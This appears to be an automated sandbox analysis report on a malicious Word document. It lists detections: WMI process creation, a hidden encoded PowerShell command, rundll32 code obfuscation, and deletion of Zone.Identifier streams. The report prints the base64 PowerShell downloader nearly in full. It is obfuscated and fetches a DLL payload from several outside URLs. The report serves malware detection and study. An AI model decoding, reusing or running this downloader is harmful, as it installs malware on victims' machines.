ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,

24_2_10004560

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001508D0 push edx; ret	7_2_001509D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001339A0 push cs; ret	7_2_001339A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00132A01 push esi; ret	7_2_00132A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00135BD8 push ss; iretd	7_2_00135C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00135C29 push ss; iretd	7_2_00135C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0013548F push ebp; retf	7_2_00135496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00132CFB push ecx; retn 001Eh	7_2_00132D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00131740 push DA0FDC41h; iretd	7_2_00131745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001908D0 push edx; ret	8_2_001909D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001739A0 push cs; ret	8_2_001739A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00172A01 push esi; ret	8_2_00172A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00175BD8 push ss; iretd	8_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00175C29 push ss; iretd	8_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0017548F push ebp; retf	8_2_00175496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00172CFB push ecx; retn 001Eh	8_2_00172D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00171740 push DA0FDC41h; iretd	8_2_00171745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E08D0 push edx; ret	9_2_001E09D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C39A0 push cs; ret	9_2_001C39A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2A01 push esi; ret	9_2_001C2A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5BD8 push ss; iretd	9_2_001C5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5C29 push ss; iretd	9_2_001C5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C548F push ebp; retf	9_2_001C5496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2CFB push ecx; retn 001Eh	9_2_001C2D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1740 push DA0FDC41h; iretd	9_2_001C1745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001908D0 push edx; ret	10_2_001909D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001739A0 push cs; ret	10_2_001739A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00172A01 push esi; ret	10_2_00172A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00175BD8 push ss; iretd	10_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00175C29 push ss; iretd	10_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0017548F push ebp; retf	10_2_00175496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00172CFB push ecx; retn 001Eh	10_2_00172D01

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
